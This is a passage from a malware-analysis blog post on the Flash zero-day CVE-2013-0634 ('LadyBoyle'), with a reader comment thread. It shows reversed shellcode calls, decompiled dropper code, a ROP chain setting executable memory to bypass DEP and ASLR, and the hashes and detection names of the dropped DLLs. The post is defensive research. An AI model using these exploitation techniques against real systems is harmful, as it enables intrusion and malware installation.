; CreateFileA("C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\abc.cfg", 
               GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL) => 
; LoadLibraryA("C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\abc.cfg")
Note that the shellcode uses a stack pivot to restore the stack back to the normal flow of execution to prevent a crash. He also reversed abc.cfg, executed as a lib via the shellcode:
     :
 *(_DWORD *)p2 = dword_10009278;             // 'cces'
 *((_DWORD *)p2 + 1) = dword_1000927C;       // 'etne'
 *((_DWORD *)p2 + 2) = dword_10009280;       // 'xx.r'
 *((_WORD *)p2 + 6) = word_10009284;         // 'x'
    :
↑which explains the dropping of the seccetnter.xxx payload. All of the above is possible since ASLR and DEP are bypassed, and he explained the ROP chain for it as quoted below:
06944000  7C809AE1  kernel32.VirtualAlloc
06944004  06944088  /CALL to VirtualAlloc
06944008  06944000  |Address = 06944000
0694400C  00002000  |Size = 2000 (8192.)
06944010  00001000  |AllocationType = MEM_COMMIT
06944014  00000040  \Protect = PAGE_EXECUTE_READWRITE
#w00t to @promised_lu :-) good job! This solves all the mystery of this exploitation. Conclusion:
The usage of hard-coded bits, the details in address calculation, using the heap spray with the change of stack value (stack pivot), with the ROP for bypassing ASLR and DEP, is a VERY sophisticated technique to be used in this exploitation. The exploitation technique of this sample is proven to be memory-corruption based.

Research Material & Samples

For raising AV detection rates & research purposes, sample -->>[HERE] The SWF's embedded DLL malwares have the below VT ratios:
SHA256 : d6459e851fda540159a78aa901b46cc2e921c57952e961edf4d817b4f5a82f14
SHA1   : c6bff71c4c9ac92f78995ac9097f8cc13779a8fc
MD5    : b4da1c3400b48803b41823feaf6085e8
File size: 241.5 KB ( 247296 bytes )
File name: CVE-2013-0634-x32bin.drop.dll
File type: Win32 DLL
Tags: exploit cve-2013-0634 pedll
Ratio: 21 / 41
Date: 2013-02-10 17:48:27 UTC ( 37 minutes ago )
URL ---->>[CLICK]
Malware names:
F-Secure                 : Dropped:Trojan.Agent.AYAF
GData                    : Dropped:Trojan.Agent.AYAF
VIPRE                    : Trojan.Win32.Generic!BT
Symantec                 : Trojan Horse
ESET-NOD32               : Win32/TrojanDropper.Agent.QAU
McAfee-GW-Edition        : Heuristic.BehavesLike.Win32.PasswordStealer.H
Fortinet                 : W32/Agent.QAU!tr
TrendMicro-HouseCall     : TROJ_GEN.R11H1B8
MicroWorld-eScan         : Dropped:Trojan.Agent.AYAF
Avast                    : Win32:Malware-gen
nProtect                 : Dropped:Trojan.Agent.AYAF
Kaspersky                : Trojan.Win32.Delf.dedq
BitDefender              : Dropped:Trojan.Agent.AYAF
McAfee                   : BackDoor-FAKV!B4DA1C3400B4
Ikarus                   : Trojan.Win32.Bredolab
Panda                    : Trj/CI.A
AhnLab-V3                : Win-Trojan/Infostealer.247296
AntiVir                  : DR/Agent.AYAF
PCTools                  : Trojan.Generic
Sophos                   : Troj/Agent-ZUP
Comodo                   : UnclassifiedMalware
SHA256 : b03623e4818e60869f67dba28ab09187782a4ae0f4539cef2c07634865f37e74
SHA1   : 040069e5ecf1110f6634961b349938682fee2a22
MD5    : dbc7e219e9af297271ea594f0ff6ad12
File size: 240.5 KB ( 246272 bytes )
File name: CVE-2013-0634-x64bin.drop.dll
File type: Win32 DLL
Tags: exploit cve-2013-0634 pedll
Ratio: 17 / 46
Date: 2013-02-10 17:49:04 UTC ( 39 minutes ago )
URL ---->>[CLICK]
Malware names:
F-Secure                 : Trojan.Generic.8698229
DrWeb                    : BackDoor.Poison.1033
GData                    : Trojan.Generic.8698229
VIPRE                    : Trojan.Win32.Generic!BT
Norman                   : Killav.LB
ESET-NOD32               : Win64/TrojanDropper.Agent.U
TrendMicro-HouseCall     : TROJ_GEN.R47H1B9
MicroWorld-eScan         : Trojan.Generic.8698229
Avast                    : Win32:Malware-gen
nProtect                 : Trojan.Generic.8698229
BitDefender              : Trojan.Generic.8698229
McAfee                   : BackDoor-AKV
Panda                    : Trj/CI.A
Ikarus                   : Win32.Malware
AVG                      : Small.EWV
Emsisoft                 : Malware.Win64.AMN (A)
Comodo                   : UnclassifiedMalware
While trying to figure out how the exploit executes the attached DLL, I took a video, and in one of the sessions I took the video with my Droid camera:

Thank you very much to the fellow researchers who encouraged me to analyze this:

False Positive Possibilities

I had a little discussion with Eric Romang about this matter on twitter. Since this CVE is new, maybe NOW we won't see a false positive where this post's code gets detected as "malware" by some security industry scanner, but I am afraid that since most web scanners do string matching to detect "malcode" in web sites, sooner or later an FP will occur, so beforehand I am assuring you that no malicious code is posted here as it is; every piece of code is tweaked, neutralized and cannot run nor be used to infect at all. Furthermore, most of the code shown is flash JS/code, which cannot be used like a usual web site's embedded JavaScript.

I am so worried that some security scanner will use the word "LadyBoyle" to grep & classify the detection of CVE-2013-0634, which exactly will NOT stop the infection of CVE-2013-0634 (since that is just the name of a "changeable" class inside an infector SWF file, which I doubt you can scan online) BUT it will exactly block this post from being viewed by the public.

This post is dedicated to security research, hopefully to be a useful reference for CVE-2013-0634; please kindly help to notify us on twitter if a false positive alarm happens. Thank you very much.

Additionals

Just seeing this tweet: I really want to see the sample; if anyone has it, please upload it via our blog's DropBox?

The mentioned "font method", or to be precise, in our case the usage of a textfield object (to be filled with exploit data) with .settextformat set to contain a font definition, was indeed detected too in this post, but I did not see any MacOSX target in my sample, so that must be the same type of exploit yet separately made. I wonder, was it only a MS Word .doc file?

Reference

[1] Adobe: Security Bulletin APSB13-04 for Adobe Flash Player-->>[Here]
[2] CVE-2013-0633 -->>[Here]
[3] CVE-2013-0634 -->>[Here]
[4] FireEye: LadyBoyle comes to town with new exploit-->>[Here]
[5] Alienvault Labs: Adobe patches two vulnerabilities being exploited in the wild-->>[Here]
[6] Eric Romang Blog: Boeing-job.com Campaign & Flash 0days Additional Informations-->>[Here]

(Fine)

#MalwareMustDie!

12 comments:

  1. Hi. Very nice post, thanks. But I don't see (in LadyBoyle) where the .exe is loaded and run...

  2. Oflenov, I thank you for the kind comment. Firstly, that is not an exe, but the dll files are embedded in there; at least it needs the shellcode to use rundll32.exe or a similar API to execute it to run.
    :-) And that's the "question" & mystery that I mentioned in the beginning of the post actually. I am now still working on simulating the things up on the very speedy execution of the swf. Hopefully I will write the conclusion in Part 2.

    Stay tuned, friend! :-)

    Replies
    1. All of the questions are answered now. No need to have Part-2. I updated the related parts accordingly.

  3. Hi Oflenov, I just finished confirming how it executes the embedded files. The method of the flash.utils.ByteArray class is used to run the embedded object in the SWF. The malicious object which is defined in the tag <DefineBinaryData id='1' idrefName='LadyBoyle_the_xBLAH_Class' length='xxx' /> was executed eventually by Adobe Flash Player (Please see the reference API HERE), which makes the malicious object infection possible < possible in the general aspect, i.e.: a dll cannot be run just like that, so I think this sample I use won't infect anyone actually.. Still cannot find any dll executor existing in every dump I made.
    PS, this execution of the embedded object by this method is the flaw that Adobe covered in the patch.
    Moreover, I finished confirming the shellcode does not exist at all, yet; only the vector object containing the exploit values of x32 and x64 exists. I will gain more strength to collect the stuff and write it in Part 2.
    In the end, this exploitation is not as tough as I thought it was; the lack of know-how in the Flash API, for me, is what makes this take time. Hope this answer solves the core questions. Feel free to recheck.

    Rgds, @unixfreaxjp

  4. pls see my analysis http://bbs.pediy.com/showthread.php?t=162493

    Replies
    1. Lu, read it. Good work on the ROP & shellcode! Thanks for the advice & I'll adjust accordingly.

    2. This analysis is forbidden for reading. How can I get it?

    3. I didn't see any blocking from my side. Forbidden by whom? What/who forbid you to view?

    4. Sorry for the long time to answer. First, it wrote to me that it needs registration. When I registered: "you do not have permission to access this page..."

    5. I have no idea, sorry. It is publicly open and shared.
      No restriction.

  5. Woaaah, So much informative information!, love the screenshots, Great post!
